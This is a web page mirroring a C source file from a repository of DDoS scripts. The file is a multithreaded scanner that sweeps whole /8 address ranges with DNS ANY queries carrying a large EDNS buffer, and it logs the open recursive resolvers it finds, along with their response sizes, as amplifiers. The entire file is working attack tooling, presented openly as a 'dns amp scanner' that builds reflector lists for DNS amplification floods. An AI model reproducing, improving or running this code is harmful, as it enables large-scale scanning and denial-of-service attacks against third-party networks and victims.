Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/DNS Amplification/dns_scanner.c
4622 views
1
/* priv8 dns amp scanner. lel */

2


3
#include <pthread.h>

4
#include <unistd.h>

5
#include <stdio.h>

6
#include <stdlib.h>

7
#include <string.h>

8
#include <sys/socket.h>

9
#include <netinet/in.h>

10
#include <signal.h>

11
#include <sys/time.h>

12
#include <sys/types.h>

13
#include <math.h>

14
#include <stropts.h>

15
#include <ctype.h>

16
#include <errno.h>

17
#include <arpa/inet.h>

18
#include <netinet/ip.h>

19
#include <netinet/udp.h>

20


21
struct DNS_HEADER

22
{

23
	unsigned short id; // identification number

24


25
	unsigned char rd :1; // recursion desired

26
	unsigned char tc :1; // truncated message

27
	unsigned char aa :1; // authoritive answer

28
	unsigned char opcode :4; // purpose of message

29
	unsigned char qr :1; // query/response flag

30


31
	unsigned char rcode :4; // response code

32
	unsigned char cd :1; // checking disabled

33
	unsigned char ad :1; // authenticated data

34
	unsigned char z :1; // its z! reserved

35
	unsigned char ra :1; // recursion available

36


37
	unsigned short q_count; // number of question entries

38
	unsigned short ans_count; // number of answer entries

39
	unsigned short auth_count; // number of authority entries

40
	unsigned short add_count; // number of resource entries

41
};

42


43
struct QUESTION

44
{

45
	unsigned short qtype;

46
	unsigned short qclass;

47
};

48


49
#pragma pack(push, 1)

50
struct R_DATA

51
{

52
	unsigned short type;

53
	unsigned short _class;

54
	unsigned int ttl;

55
	unsigned short data_len;

56
};

57
#pragma pack(pop)

58


59
struct RES_RECORD

60
{

61
	unsigned char *name;

62
	struct R_DATA *resource;

63
	unsigned char *rdata;

64
};

65


66
typedef struct

67
{

68
	unsigned char *name;

69
	struct QUESTION *ques;

70
} QUERY;

71


72
volatile int running_threads = 0;

73
volatile int found_srvs = 0;

74
volatile unsigned long per_thread = 0;

75
volatile unsigned long start = 0;

76
volatile unsigned long scanned = 0;

77
volatile int sleep_between = 0;

78
volatile int bytes_sent = 0;

79
volatile unsigned long hosts_done = 0;

80
FILE *fd;

81


82
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)

83
{

84
	int lock = 0 , i;

85
	strcat((char*)host,".");

86


87
	for(i = 0 ; i < strlen((char*)host) ; i++)

88
	{

89
		if(host[i]=='.')

90
		{

91
			*dns++ = i-lock;

92
			for(;lock<i;lock++)

93
			{

94
				*dns++=host[lock];

95
			}

96
			lock++;

97
		}

98
	}

99
	*dns++='\0';

100
}

101


102
void *flood(void *par1)

103
{

104
	running_threads++;

105
	int thread_id = (int)par1;

106
	unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));

107
	unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));

108
	unsigned long w;

109
	int y;

110
	unsigned char *host = (unsigned char *)malloc(50);

111
	strcpy((char *)host, ".");

112
	unsigned char buf[65536],*qname;

113
	struct DNS_HEADER *dns = NULL;

114
	struct QUESTION *qinfo = NULL;

115
	dns = (struct DNS_HEADER *)&buf;

116


117
	dns->id = (unsigned short) htons(rand());

118
	dns->qr = 0;

119
	dns->opcode = 0;

120
	dns->aa = 0;

121
	dns->tc = 0;

122
	dns->rd = 1;

123
	dns->ra = 0;

124
	dns->z = 0;

125
	dns->ad = 0;

126
	dns->cd = 0;

127
	dns->rcode = 0;

128
	dns->q_count = htons(1);

129
	dns->ans_count = 0;

130
	dns->auth_count = 0;

131
	dns->add_count = htons(1);

132
	qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];

133


134
	ChangetoDnsNameFormat(qname , host);

135
	qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];

136


137
	qinfo->qtype = htons( 255 );

138
	qinfo->qclass = htons(1);

139


140
	void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;

141
	memset(edns, 0x00, 1);

142
	memset(edns+1, 0x29, 1);

143
	memset(edns+2, 0xFF, 2);

144
	memset(edns+4, 0x00, 7);

145


146
	int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;

147
	int sock;

148
	if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {

149
		perror("cant open socket");

150
		exit(-1);

151
	}

152
	for(w=ntohl(start_ip);w<htonl(end);w++)

153
	{

154
		struct sockaddr_in servaddr;

155
		bzero(&servaddr, sizeof(servaddr));

156
		servaddr.sin_family = AF_INET;

157
		servaddr.sin_addr.s_addr=htonl(w);

158
		servaddr.sin_port=htons(53);

159
		sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));

160
		bytes_sent+=24;

161
		scanned++;

162
		hosts_done++;

163
		usleep(sleep_between*1000);

164
	}

165
	close(sock);

166
	running_threads--;

167
	return;

168
}

169


170
void sighandler(int sig)

171
{

172
	fclose(fd);

173
	printf("\n");

174
	exit(0);

175
}

176


177
void recievethread()

178
{

179
	printf("Started Listening Thread\n");

180
	int saddr_size, data_size, sock_raw;

181
	struct sockaddr_in saddr;

182
	struct in_addr in;

183


184
	unsigned char *buffer = (unsigned char *)malloc(65536);

185
	sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);

186
	if(sock_raw < 0)

187
	{

188
		printf("Socket Error\n");

189
		exit(1);

190
	}

191
	while(1)

192
	{

193
		saddr_size = sizeof saddr;

194
		data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);

195
		if(data_size <0 )

196
		{

197
			printf("Recvfrom error , failed to get packets\n");

198
			exit(1);

199
		}

200
		struct iphdr *iph = (struct iphdr*)buffer;

201
		if(iph->protocol == 17)

202
		{

203
			unsigned short iphdrlen = iph->ihl*4;

204
			struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);

205
			unsigned char* payload = buffer + iphdrlen + 8;

206
			if(ntohs(udph->source) == 53)

207
			{

208
				int body_length = data_size - iphdrlen - 8;

209
				struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;

210
				if(dns->ra == 1)

211
				{

212
					found_srvs++;

213
					fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);

214
					fflush(fd);

215
				}

216
			}

217
		}

218


219
	}

220
	close(sock_raw);

221


222
}

223


224
int main(int argc, char *argv[ ])

225
{

226


227
	if(argc < 6){

228
		fprintf(stderr, "Invalid parameters!\n");

229
		fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);

230
		exit(-1);

231
	}

232
	fd = fopen(argv[3], "a");

233
	sleep_between = atoi(argv[5]);

234


235
	signal(SIGINT, &sighandler);

236


237
	int threads = atoi(argv[4]);

238
	pthread_t thread;

239


240
	pthread_t listenthread;

241
	pthread_create( &listenthread, NULL, &recievethread, NULL);

242


243
	char *str_start = malloc(18);

244
	memset(str_start, 0, 18);

245
	str_start = strcat(str_start,argv[1]);

246
	str_start = strcat(str_start,".0.0.0");

247
	char *str_end = malloc(18);

248
	memset(str_end, 0, 18);

249
	str_end = strcat(str_end,argv[2]);

250
	str_end = strcat(str_end,".255.255.255");

251
	start = inet_addr(str_start);

252
	per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;

253
	unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));

254
	int i;

255
	for(i = 0;i<threads;i++){

256
		pthread_create( &thread, NULL, &flood, (void *) i);

257
	}

258
	sleep(1);

259
	printf("Starting Scan...\n");

260
	char *temp = (char *)malloc(17);

261
	memset(temp, 0, 17);

262
	sprintf(temp, "Found");

263
	printf("%-16s", temp);

264
	memset(temp, 0, 17);

265
	sprintf(temp, "Host/s");

266
	printf("%-16s", temp);

267
	memset(temp, 0, 17);

268
	sprintf(temp, "B/s");

269
	printf("%-16s", temp);

270
	memset(temp, 0, 17);

271
	sprintf(temp, "Running Thrds");

272
	printf("%-16s", temp);

273
	memset(temp, 0, 17);

274
	sprintf(temp, "Done");

275
	printf("%s", temp);

276
	printf("\n");

277


278
	char *new;

279
	new = (char *)malloc(16*6);

280
	while (running_threads > 0)

281
	{

282
		printf("\r");

283
		memset(new, '\0', 16*6);

284
		sprintf(new, "%s|%-15lu", new, found_srvs);

285
		sprintf(new, "%s|%-15d", new, scanned);

286
		sprintf(new, "%s|%-15d", new, bytes_sent);

287
		sprintf(new, "%s|%-15d", new, running_threads);

288
		memset(temp, 0, 17);

289
		int percent_done=((double)(hosts_done)/(double)(toscan))*100;

290
		sprintf(temp, "%d%%", percent_done);

291
		sprintf(new, "%s|%s", new, temp);

292
		printf("%s", new);

293
		fflush(stdout);

294
		bytes_sent=0;

295
		scanned = 0;

296
		sleep(1);

297
	}

298
	printf("\n");

299
	fclose(fd);

300
	return 0;

301
}

302